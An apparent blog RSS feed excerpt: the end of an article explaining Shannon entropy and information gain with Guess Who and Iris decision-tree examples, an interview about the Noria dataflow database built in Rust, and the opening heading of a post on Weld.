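    """Shannon entropy in bits of a distribution given as probabilities p_i."""
    return -sum(p * math.log2(p) for p in probs if p > 0)

# A fair coin carries one full bit of uncertainty; a certain outcome carries none.
```

For instance, `entropy([0.5, 0.5])` is 1.0, while an uneven split like `entropy([0.7, 0.3])` is only about 0.881.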
&lt;h4 id=&quot;guess-who-example&quot;&gt;Guess Who example&lt;&#x2F;h4&gt;
&lt;p&gt;Let’s take a different approach. Suppose you are playing &lt;em&gt;Guess Who&lt;&#x2F;em&gt;, the game where you ask yes&#x2F;no questions about the appearance of your opponent’s character in order to single him or her out among a set of characters. You ask yourself: what order should I ask the questions in to maximise the probability of winning? Intuitively, you try to ask first about features most of the characters have.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-TkW9quvg52IBgM06fM-7IA.jpeg&quot; alt=&quot;&quot; &#x2F;&gt;Hardcore Guess Who gamers apply Information Theory for optimal results&lt;&#x2F;p&gt;
&lt;p&gt;Moreover, an optimal question is one that divides the population evenly, that is, one that regardless of the answer (&lt;em&gt;yes&lt;&#x2F;em&gt; or &lt;em&gt;no&lt;&#x2F;em&gt;) discards half the characters. In any other case, you are not gaining the optimal amount of information with each question.&lt;&#x2F;p&gt;
&lt;p&gt;But what if you can’t divide the characters evenly by their characteristics? To answer the question, first we recall the concept of entropy defined above. We can think of a question as a variable &lt;em&gt;X&lt;&#x2F;em&gt; that splits the population into groups &lt;em&gt;xᵢ&lt;&#x2F;em&gt; with probabilities &lt;em&gt;pᵢ&lt;&#x2F;em&gt;. For example, think of a question about the eye color of the character (the questions in the game are technically only &lt;em&gt;yes&lt;&#x2F;em&gt; or &lt;em&gt;no&lt;&#x2F;em&gt; but this can be generalized). With this in mind, the entropy of a question becomes:&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-KZq1CO03SyEnsH0qLamzRQ.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;The intuition here is that with each possible answer, we gain an amount of information −log &lt;em&gt;p&lt;&#x2F;em&gt;(&lt;em&gt;xᵢ&lt;&#x2F;em&gt;): if we receive an answer with a very low probability (i.e. we ask if the character has a feature that is shared by very few people, and the answer is yes), we gain more information than we would from a more probable answer.&lt;&#x2F;p&gt;
&lt;p&gt;On the other hand, entropy is related to uncertainty. For example, if we flip a coin, the uncertainty in the outcome is higher with &lt;em&gt;p&lt;&#x2F;em&gt; = 0.5 than with any other value of &lt;em&gt;p&lt;&#x2F;em&gt;. And in our case, more uncertainty is better. Why? If we choose a question with an uneven distribution in the population, let’s say 0.7 and 0.3, the odds are that our character is among the 70%, so a &lt;em&gt;no&lt;&#x2F;em&gt; answer discards only the remaining 30%. With a more even (and therefore more uncertain) division, we always tend to discard 50% of the population, which is an advantage in the long run. This means that the best questions to ask are those that maximize the entropy, i.e., the ones with the highest uncertainty.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;decision-trees&quot;&gt;Decision Trees&lt;&#x2F;h4&gt;
&lt;p&gt;One common use of entropy is in decision trees, where one uses a set of features (features that split the data into disjoint sets) to construct a flowchart for a classification problem. Here, a common question is: which order should we “apply” the features in to get the best splits? A possible solution is to recursively always use the feature that maximizes the &lt;em&gt;information gain&lt;&#x2F;em&gt;. If we’re working with a dataset &lt;em&gt;S&lt;&#x2F;em&gt; and our feature is called &lt;em&gt;X&lt;&#x2F;em&gt; , the information gained on &lt;em&gt;S&lt;&#x2F;em&gt; by &lt;em&gt;X&lt;&#x2F;em&gt; , &lt;em&gt;I&lt;&#x2F;em&gt;(&lt;em&gt;S&lt;&#x2F;em&gt; ,&lt;em&gt;X&lt;&#x2F;em&gt;), is calculated as:&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-tIzlfBpMihRvpfZICpWZJA.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;where &lt;em&gt;H&lt;&#x2F;em&gt;(&lt;em&gt;S&lt;&#x2F;em&gt; |&lt;em&gt;X&lt;&#x2F;em&gt;) is the conditional entropy of &lt;em&gt;S&lt;&#x2F;em&gt; given &lt;em&gt;X&lt;&#x2F;em&gt;. Intuitively, this is just the reduction in the entropy of the dataset &lt;em&gt;S&lt;&#x2F;em&gt; if we know &lt;em&gt;X&lt;&#x2F;em&gt;. Thus, it makes sense to choose the features &lt;em&gt;X&lt;&#x2F;em&gt; that maximize this value, as they will be the ones that reduce uncertainty the most, effectively obtaining the best splits.&lt;&#x2F;p&gt;
&lt;p&gt;Algorithms that consider the information gain at each node to choose the next feature are called &lt;em&gt;greedy&lt;&#x2F;em&gt; algorithms. Such algorithms do not take into account the overall information gain and may lead in some cases to suboptimal queries, but they are well-behaved and have a straightforward approach.&lt;&#x2F;p&gt;
&lt;p&gt;As an example, consider the picture below, where a decision tree method was used on the famous Iris flower dataset and two features were selected, the petal width, first with 0.8 cm as a threshold and then 1.75 cm. Setting aside how these specific features are selected, why use the ≤ 0.8 first? With the information gain calculation we described, we can provide an answer. We will call the feature that separates petal width on 0.8 cm &lt;em&gt;X&lt;&#x2F;em&gt; and the other one &lt;em&gt;Y&lt;&#x2F;em&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-dEesB-YyIVG81qhIDn_T_w.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Applying &lt;em&gt;X&lt;&#x2F;em&gt; first splits the 150 data points (usually one would split between training and test sets, here for simplicity we use the entire set) into two sets: one containing the entire &lt;em&gt;setosa&lt;&#x2F;em&gt; class (50 points, corresponding to ≤ 0.8 cm) and nothing else, and the other containing the rest. In that case the calculations yield:&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-2dDOZS_8PGYonq3RZYoyAg.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;On the other hand, applying &lt;em&gt;Y&lt;&#x2F;em&gt; first gives us one set with 50 &lt;em&gt;setosa&lt;&#x2F;em&gt; , 49 &lt;em&gt;versicolor&lt;&#x2F;em&gt; and 5 &lt;em&gt;virginica&lt;&#x2F;em&gt; (≤ 1.75 cm) and another with no &lt;em&gt;setosa&lt;&#x2F;em&gt; , 1 &lt;em&gt;versicolor&lt;&#x2F;em&gt; and 45 &lt;em&gt;virginica&lt;&#x2F;em&gt;. This leaves us with:&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-VCQsujq_mEufMZi1X4DGdw.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Thus the information gain from &lt;em&gt;X&lt;&#x2F;em&gt; (petal width being under or over 0.8 cm) is greater than the one from &lt;em&gt;Y&lt;&#x2F;em&gt; , and we should use it first. This makes sense intuitively, as &lt;em&gt;X&lt;&#x2F;em&gt; completely separates the &lt;em&gt;setosa&lt;&#x2F;em&gt; class from the other two, whereas using &lt;em&gt;Y&lt;&#x2F;em&gt; first gives a more entangled split.&lt;&#x2F;p&gt;
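Using the class counts quoted above (setosa, versicolor, virginica), both information gains can be reproduced in a few lines of Python (a sketch of the calculation, not code from the article):

```python
import math

def entropy_from_counts(counts):
    """Shannon entropy in bits of a class-count vector."""
    total = sum(counts)
    return -sum(c / total * math.log2(c / total) for c in counts if c > 0)

def information_gain(parent, children):
    """I(S, X) = H(S) - H(S|X), with H(S|X) weighted by child set sizes."""
    total = sum(parent)
    conditional = sum(sum(child) / total * entropy_from_counts(child)
                      for child in children)
    return entropy_from_counts(parent) - conditional

# Counts are (setosa, versicolor, virginica).
gain_x = information_gain([50, 50, 50], [[50, 0, 0], [0, 50, 50]])
gain_y = information_gain([50, 50, 50], [[50, 49, 5], [0, 1, 45]])
```

`gain_x` comes out around 0.918 bits against roughly 0.686 bits for `gain_y`, confirming that the 0.8 cm split should go first.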
&lt;h4 id=&quot;conclusion&quot;&gt;Conclusion&lt;&#x2F;h4&gt;
&lt;p&gt;It is hard to overstate the importance of Shannon’s work: the Theory of Information has found &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.britannica.com&#x2F;science&#x2F;information-theory&#x2F;Applications-of-information-theory&quot;&gt;many applications&lt;&#x2F;a&gt; in fields as diverse as statistical inference and machine learning, natural language processing, genetics, data compression, coding theory, and cryptography. With over 120,000 citations, few papers can boast a similar impact. In the words of information theorist Anthony Ephremides:&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;It was like an earthquake and the aftershocks haven’t finished yet!&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
</description>
      </item>
      <item>
          <title>Interview with Noria’s creator: a promising dataflow research database implemented in Rust</title>
          <pubDate>Tue, 22 Oct 2019 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/interview-with-norias-creator-a-promising-dataflow-database-implemented-in-rust/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/interview-with-norias-creator-a-promising-dataflow-database-implemented-in-rust/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/interview-with-norias-creator-a-promising-dataflow-database-implemented-in-rust/">&lt;p&gt;After reading &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;download.tensorflow.org&#x2F;paper&#x2F;whitepaper2015.pdf&quot;&gt;Tensorflow’s original paper&lt;&#x2F;a&gt; I learnt that four of its authors were authors of Microsoft &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;sigops.org&#x2F;s&#x2F;conferences&#x2F;sosp&#x2F;2013&#x2F;papers&#x2F;p439-murray.pdf&quot;&gt;Naiad’s research paper&lt;&#x2F;a&gt; too. Naiad influenced many systems like Tensorflow.&lt;&#x2F;p&gt;
&lt;p&gt;The Naiad paper is really interesting since it brings together many computation patterns: batch computation, streaming computation, and graph computation. It seemed to be a higher-level abstraction than the traditional MapReduce and at the same time a more elegant &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Lambda_architecture&quot;&gt;Lambda architecture&lt;&#x2F;a&gt; that combines batch processing with streaming methods. Being a practitioner and not a researcher, I found that this paper helped me understand and compare different projects like Hadoop, Spark, Storm, Samza, Flink, and Kafka Streams.&lt;&#x2F;p&gt;
&lt;p&gt;Naiad’s paper introduced a computational model called timely dataflow that has influenced other systems like &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;mit-pdos&#x2F;noria&quot;&gt;Noria&lt;&#x2F;a&gt;. Noria is a fast storage backend for read-heavy web applications, implemented in Rust with a MySQL adapter. One of its creators is Jon Gjengset, a PhD student in the Parallel and Distributed Operating Systems group at MIT. Jon has a great &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;thesquareplanet.com&#x2F;blog&#x2F;&quot;&gt;blog&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.youtube.com&#x2F;channel&#x2F;UC_iD0xppBwwsrM9DegC5cQQ&quot;&gt;youtube channel&lt;&#x2F;a&gt; where he discusses everything from distributed algorithms to how to implement a ZooKeeper clone. His interest in many subjects I love (Rust, distributed systems, databases) and the relationship between Noria, Naiad, and Tensorflow were reasons enough to interview him. We did not discuss Tensorflow, but I hope to learn more about that relationship in the future.&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;p&gt;&lt;strong&gt;What is Noria?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Noria is a dynamic dataflow database that supports partial and incremental materialized views. To break that down a bit more, it is a database that is implemented using a streaming dataflow engine that can be changed on the fly (that’s the dynamic part). It supports pre-computing the results of queries (materialized views), and updates those materialized results as the data is updated (view maintenance).&lt;&#x2F;p&gt;
&lt;p&gt;When this happens, the results are updated in-place rather than recomputed wholesale (i.e., the maintenance is incremental). When queries have parameters (e.g., &lt;em&gt;foo = ?&lt;&#x2F;em&gt;), it supports materializing the results for only some values of &lt;em&gt;foo&lt;&#x2F;em&gt;, and will compute results for “missing” values only when they are required (i.e., the materializations are partial).&lt;&#x2F;p&gt;
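&lt;p&gt;As a rough illustration (our sketch, not Noria’s actual code), partial and incremental materialization for a parameterized count query can be modeled as a cache that is filled on a read miss and then updated in place on every write:&lt;&#x2F;p&gt;

```python
# Toy model of a partially, incrementally materialized view for
# "SELECT COUNT(*) FROM votes WHERE article = ?". Not Noria's code.
class PartialView:
    def __init__(self, base_rows):
        self.base = list(base_rows)   # base table: a list of article ids
        self.cache = {}               # materialized counts, keyed by parameter

    def on_write(self, article):
        self.base.append(article)
        # Incremental maintenance: bump the cached result in place
        # instead of recomputing the whole count.
        if article in self.cache:
            self.cache[article] += 1

    def read(self, article):
        # Partial materialization: compute on a miss, then keep maintaining it.
        if article not in self.cache:
            self.cache[article] = sum(1 for a in self.base if a == article)
        return self.cache[article]

view = PartialView(["a", "a", "b"])
assert view.read("a") == 2      # first read materializes the entry
view.on_write("a")              # a write updates the view incrementally
assert view.read("a") == 3
assert "b" not in view.cache    # never queried, so never materialized
```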
&lt;p&gt;&lt;strong&gt;How does it compare to other software like a relational database, in memory key-value stores, map reduce systems like Spark, stream processing like Storm or timely data flow?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;The answer here requires some nuance, so please bear with me.&lt;&#x2F;p&gt;
&lt;p&gt;Noria is very similar to a relational database on the outside. It has tables and SQL queries, and even supports the MySQL binary protocol. You interact with Noria through prepared statements, &lt;em&gt;SELECT&lt;&#x2F;em&gt;s, &lt;em&gt;INSERT&lt;&#x2F;em&gt;s, and &lt;em&gt;UPDATE&lt;&#x2F;em&gt;s. Internally though, it is quite different. Whereas a traditional database executes a query when it receives a &lt;em&gt;SELECT&lt;&#x2F;em&gt;, Noria generally executes &lt;strong&gt;all&lt;&#x2F;strong&gt; queries whenever the data a query’s result depends on changes. In the steady state of the system, we expect queries to be executed on &lt;strong&gt;write&lt;&#x2F;strong&gt;, not on &lt;strong&gt;read&lt;&#x2F;strong&gt;. There are some smarts required here to avoid undue work. For example, Noria only computes and maintains results for query parameters the application cares about (this is the “partial materialization” piece). Noria also executes queries “incrementally”: if you add a new vote to an article with a million votes, it knows to increase the count by one, rather than count a million and one things all over again.&lt;&#x2F;p&gt;
&lt;p&gt;While Noria implements a key-value store internally to maintain and serve its materialized results, it does not seem like a key-value store to users of the system. Application authors write full SQL queries, and get structured results (rows of columns) back, just like with a normal database. The only sense in which Noria is like a key-value store is in its performance — query results will generally be fetched about as fast as a key-value store lookup.&lt;&#x2F;p&gt;
&lt;p&gt;Streaming data-flow systems like Spark, Storm, Kafka, and timely dataflow share many similarities with Noria. They process data in the same streaming fashion, and have a similar distributed system design that relies on sharding and operator partitioning. Noria differs from these systems in a few principal ways though. First, users of Noria can change the running dataflow at any time without downtime. If a new SQL query is issued that the system has not seen before, it adapts the running dataflow on the fly to incorporate the operators from the new query. The adaptation also knows to re-use existing operators where possible to produce an overall more efficient dataflow than what you would get if you just ran each query as its own dataflow program.&lt;br &#x2F;&gt;
Second, Noria supports partial materialization. Existing dataflow systems that support materialization are usually either windowed (i.e., they only reflect “recent” updates) or fully materialized (i.e., all results are always stored and maintained). Neither of these would work for web applications. When you issue a query, you expect to get all the results for &lt;strong&gt;that&lt;&#x2F;strong&gt; query (so no windowing), but you also don’t expect the system to waste resources on results that your application does not care about. You can think of this latter requirement as “you need the ability to evict from your cache”. And finally, Noria has a familiar interface for its queries: you issue SQL queries, and the system automatically translates them into efficient dataflow and adapts the running system to them. The other systems do not generally support this.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;The Noria paper states that it can scale to 5x higher load than a hand optimised MySQL database. How does it manage to do that?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;The primary reason for this is Noria’s view materialization. When you issue a query to MySQL, the system has to &lt;strong&gt;execute&lt;&#x2F;strong&gt; that query to produce the query’s results. In Noria, on the other hand, an application query effectively turns into a hashmap lookup in the common case, which is &lt;strong&gt;very&lt;&#x2F;strong&gt; fast. Noria’s reads can also happen entirely in parallel, with very little synchronization overhead, whereas MySQL includes a lot of machinery to support full-fledged transactions (which Noria does not support). Part of the trick here is Noria’s use of a neat little data structure called an evmap (for “eventual map”; named for its support for eventual consistency). It allows reads and writes to proceed entirely in parallel with very little overhead by having reads and writes go to different hashmaps, and then occasionally atomically switching between them.&lt;&#x2F;p&gt;
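&lt;p&gt;To make the evmap idea concrete, here is a toy single-threaded sketch of the two-map scheme (a simplification of ours; the real Rust crate uses atomic pointer swaps and epoch counting, not plain Python objects): writes go to one map and an operation log, reads go to the other, and a refresh swaps the maps and replays the log.&lt;&#x2F;p&gt;

```python
# Toy model of the evmap "two maps plus oplog" technique; not the real crate.
class DoubleMap:
    def __init__(self):
        self.read_map = {}    # readers only ever look here
        self.write_map = {}   # writers only ever touch this one
        self.oplog = []       # operations not yet applied to both maps

    def insert(self, k, v):
        # Writers never mutate the map readers are using,
        # so readers never observe a partial write.
        self.write_map[k] = v
        self.oplog.append((k, v))

    def refresh(self):
        # Publish: swap the two maps, then replay the log so the new
        # write map catches up with everything readers can now see.
        self.read_map, self.write_map = self.write_map, self.read_map
        for k, v in self.oplog:
            self.write_map[k] = v
        self.oplog.clear()

    def get(self, k):
        return self.read_map.get(k)

m = DoubleMap()
m.insert("x", 1)
assert m.get("x") is None   # not visible until the writer refreshes
m.refresh()
assert m.get("x") == 1      # now published to readers
```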
&lt;p&gt;&lt;strong&gt;What is the relationship between&lt;&#x2F;strong&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;jon.tsp.io&#x2F;papers&#x2F;osdi18-noria.pdf&quot;&gt;&lt;strong&gt;Noria’s paper&lt;&#x2F;strong&gt;&lt;&#x2F;a&gt;&lt;strong&gt;, the&lt;&#x2F;strong&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;timelydataflow&#x2F;differential-dataflow&#x2F;blob&#x2F;master&#x2F;differentialdataflow.pdf&quot;&gt;&lt;strong&gt;Differential dataflow&lt;&#x2F;strong&gt;&lt;&#x2F;a&gt;&lt;strong&gt;paper and&lt;&#x2F;strong&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;sigops.org&#x2F;s&#x2F;conferences&#x2F;sosp&#x2F;2013&#x2F;papers&#x2F;p439-murray.pdf&quot;&gt;&lt;strong&gt;Naiad: a timely dataflow system&lt;&#x2F;strong&gt;&lt;&#x2F;a&gt;&lt;strong&gt;?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Differential dataflow and timely dataflow, together with their implementation in Naiad, form one of the hallmark systems in the dataflow community. Most papers in this area relate to timely dataflow in one way or another. In the case of Noria, we also implement an incremental dataflow model, but we are trying to solve for a different use-case, and therefore arrive at different solutions.&lt;&#x2F;p&gt;
&lt;p&gt;In particular, timely established a model for incrementally executing dataflow programs that include iteration and cycles with strong guarantees about consistency through a sophisticated timestamp tracking scheme. Noria does not support iteration or cycles, and is eventually consistent.&lt;&#x2F;p&gt;
&lt;p&gt;Instead, we provide high-performance materialized views for fast reads, partial state so only the working set needs to be kept in memory, automatic multi-query optimization, support for dynamically modifying the dataflow as it runs, and of course SQL support. Timely does not support these features, though you could likely manually implement some of them on top of timely’s core given enough time and research effort.&lt;&#x2F;p&gt;
&lt;p&gt;Overall, I don’t think it’s fair to say one system is &lt;strong&gt;better&lt;&#x2F;strong&gt; than another. In many ways they complement each other. Timely largely targets arbitrary batch computations over a large, interconnected dataset where reads are less frequent than just observing the “output” of the computation. And it is &lt;strong&gt;very&lt;&#x2F;strong&gt; good at that. Noria targets read-heavy applications where repeated and similar queries are common, and where the queries change over time. And it is &lt;strong&gt;very&lt;&#x2F;strong&gt; good at that.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Do you implement the full SQL language?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;It’s not clear what “full SQL” even really means, with all of the various extensions to the language that have been added to different implementations over time. Even if you restrict yourself to ANSI SQL though, the answer for Noria is no, although mostly for uninteresting reasons. Noria is a research prototype, and as such we have focused on the features that required active research to implement in Noria’s database model. Many of the remaining features we believe could be added with sufficient engineering effort, but without too much technical difficulty. To give some examples of things we don’t support: joins whose join condition is not a single column equality; &lt;em&gt;ORDER BY&lt;&#x2F;em&gt; without a limit; &lt;em&gt;CASE&lt;&#x2F;em&gt; statements; &lt;em&gt;LIKE&lt;&#x2F;em&gt; conditions; and of course the &lt;em&gt;SOUNDEX&lt;&#x2F;em&gt; operator. There are also patterns that we support, but that we believe could be optimized further, such as multi-way joins and multiple aggregations in a single query.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Why did you choose to use RocksDB to persist the data?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;This was a more or less arbitrary decision. We initially wrote all base table writes directly to disk as a log, but quickly realized we needed to also keep indices over that on-disk data, otherwise recovery would be far too slow. We looked for an off-the-shelf solution, and RocksDB seemed to fit the bill. The interface for this base storage layer is pretty straightforward, and it should not be too difficult to slot in another solution there. The biggest challenge in doing so is maintaining some invariants around which writes are visible when, for the purposes of Noria’s upqueries, but we believe these are solvable without too much trouble.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Why does Noria need to have Zookeeper running? Why did you choose ZooKeeper over etcd or consul?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Zookeeper serves two purposes in Noria at the moment: service discovery and leadership election. And in fact, if you run a Noria server and client in a single process, you don’t actually need Zookeeper running at all.&lt;&#x2F;p&gt;
&lt;p&gt;If you run a single Noria worker, and a separate client, Zookeeper is only used for the client to have an easy way to discover the location of the server. We’re considering adding a non-distributed mode to Noria which supports this single-worker use-case without Zookeeper. The bits are already in place (take a look at the &lt;em&gt;Authority&lt;&#x2F;em&gt; trait in the code if you are curious), it just hasn’t been a priority for us to fix. If you are running &lt;strong&gt;multiple&lt;&#x2F;strong&gt; Noria workers, then they need some way to agree on which worker is responsible for driving application-issued changes to the dataflow, and that is where Zookeeper’s consensus comes into play. We needed a system that allowed the workers to agree on who that should be, with a mechanism for failover, and Zookeeper provided that. The API we need from Zookeeper is very limited, and it should be straightforward to slot in another consensus provider in its place.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Is Noria production ready? Do you know anybody using it?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Noria is most definitely still a research prototype, though I think the thing standing between where it is now and a production-ready version is mostly just engineering effort. We are a small team of researchers working on it, and we focus our efforts on the aspects of the system that are related to our ongoing research. There is relatively little room for spending lots of time on doing “production engineering” in the academic setting :)&lt;&#x2F;p&gt;
&lt;p&gt;That said, I know of several large companies who are very interested in using Noria in a production setting, and many of them have gotten in touch with me about what might be required to achieve that. I also know that multiple companies are trying Noria out privately internally to test its viability as a replacement for certain parts of their stack. What ultimately comes of that is unclear at the moment, but I of course hope that they find Noria promising, and that they are willing to invest time into making it production ready!&lt;&#x2F;p&gt;
&lt;p&gt;There are a few features missing from Noria that I think are the primary blockers from using it in production. The first is checkpointing of materialized views. Currently, if the system is turned off and then restarted, all the materialized views are empty. This would be equivalent to a full cache purge. An external system could heat the cache, but it’d be better if Noria internally kept some form of snapshot to aid in this process. The second is fault tolerance — when Noria is run in a distributed setting, a machine failure results in related parts of the dataflow being blown away entirely and restarted. This is obviously problematic in production settings. We are actively pursuing research in this area, and have some ideas for how to fix it, but it is a complex subject. And finally, Noria currently requires ownership of its base storage. If you have an existing data store that you’d like to keep using, you’d have to feed changes to that data to Noria, and Noria would store it a second time. Changing Noria such that it can handle the base storage being managed by a different system is possible, though would require some careful engineering with respect to consistency of upqueries.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;When would you avoid using Noria?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Noria is not great for systems that do not have a well-defined working set. If your application is constantly issuing entirely new queries over your data that do not relate to previous queries, or if it rarely queries by the same set of keys more than once, then Noria’s materializations will be mostly useless and just add unnecessary overhead. Noria is also primarily built for read-heavy applications; if your application rarely does reads, but sustains a &lt;strong&gt;very&lt;&#x2F;strong&gt; high write load, then Noria in its current form is probably not what you want. I say “probably” because Noria already supports a fairly high write throughput, and if your inputs fall below that threshold, Noria will still work fine. And, crucially, its materializations will make your reads over this quickly growing collection really fast!&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Why did you choose to use Rust to implement it?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;The answer to this is perhaps less interesting than you’d expect. When we first started this iteration of the project in mid-2016, Rust was just starting to appear as a viable systems language. We were looking for a systems language to use for this new project, did not particularly want to write C++, and wanted to explore something beyond Go. We heard about Rust, its claims were enticing, so as researchers we figured we’d try it out and see if it could live up to its promises. The cost of failure was low, as we could always start over, so we just ran with it. And now we’re 80k lines of code in, and I still think it was the right choice.&lt;&#x2F;p&gt;
&lt;p&gt;I can also give a post-hoc analysis of the journey. I think choosing Rust has worked out great for us; specifically, it has saved us countless hours of debugging. We write a lot of concurrent code in Noria, and the Rust compiler has caught a ridiculous number of concurrency bugs that would just have slipped right by in another language. Debugging those in a distributed context in a research system where we don’t even know if the underlying &lt;strong&gt;algorithm&lt;&#x2F;strong&gt; is sound would have been a major pain (and still is when it happens). Rust has also allowed us to write low-level code when we needed to squeeze out those last bits of performance in the core pieces of Noria. What is more, I have found the Rust ecosystem to be a joy to participate in and to rely on; solid libraries like tokio have allowed us to focus on the core research-y parts of the application, and lots of knowledgeable Rustaceans have helped us when we’ve run into weird issues. Not only that, but we have been able to contribute back to that ecosystem by publishing libraries of our own and by contributing back to the compiler and other core libraries that we relied on.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;You have videos on how to implement a TCP stack and a minimal Zookeeper clone, and blog posts explaining how to implement Raft. What would a traditional full-stack developer gain from learning how to implement low-level structures, distributed algorithms or distributed software?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I think much of this comes down to curiosity. If you’re curious about how stuff works, there’s an endless number of rabbit holes you can easily start down that teach you all of this stuff. For me, much of my distributed systems knowledge came from MIT’s 6.824 Distributed Systems class, which is &lt;strong&gt;excellent&lt;&#x2F;strong&gt;. All of their reading materials, lecture notes, and labs are also available online. For algorithms, the easiest way to get started in thinking about them is to read some of the early papers describing these algorithms, and then try to implement them yourself! You’ll find that many of them aren’t as difficult to build as you may think, and you will learn a lot in the process. Including how to read academic papers! I can also recommend trying to follow some low-level OS-building resources. For example, Philipp Oppermann has a great blog series on implementing an operating system from scratch in Rust that goes through all of the low-level details you’ll need to know.&lt;&#x2F;p&gt;
&lt;p&gt;Alternatively, all the components of MIT’s 6.828 Operating Systems class are also available online.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What papers, readings and exercises do you recommend doing to learn about distributed programming?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I would highly recommend following the 6.824 class schedule (&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;pdos.csail.mit.edu&#x2F;6.824&#x2F;schedule.html&quot;&gt;https:&#x2F;&#x2F;pdos.csail.mit.edu&#x2F;6.824&#x2F;schedule.html&lt;&#x2F;a&gt;). It covers classic papers, established approaches, and new research in the area. Do the labs as well; they will force you to get &lt;strong&gt;intimately&lt;&#x2F;strong&gt; familiar with many subtle distributed systems problems!&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Weld: accelerating numpy, scikit and pandas as much as 100x with Rust and LLVM</title>
          <pubDate>Sat, 21 Sep 2019 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/weld-accelerating-numpy-scikit-and-pandas-as-much-as-100x-with-rust-and-llvm/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/weld-accelerating-numpy-scikit-and-pandas-as-much-as-100x-with-rust-and-llvm/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/weld-accelerating-numpy-scikit-and-pandas-as-much-as-100x-with-rust-and-llvm/">&lt;h3 id=&quot;interview-with-weld-s-main-contributor-accelerating-numpy-scikit-and-pandas-as-much-as-100x-with-rust-and-llvm&quot;&gt;Interview with Weld’s main contributor: accelerating numpy, scikit and pandas as much as 100x with Rust and LLVM&lt;&#x2F;h3&gt;
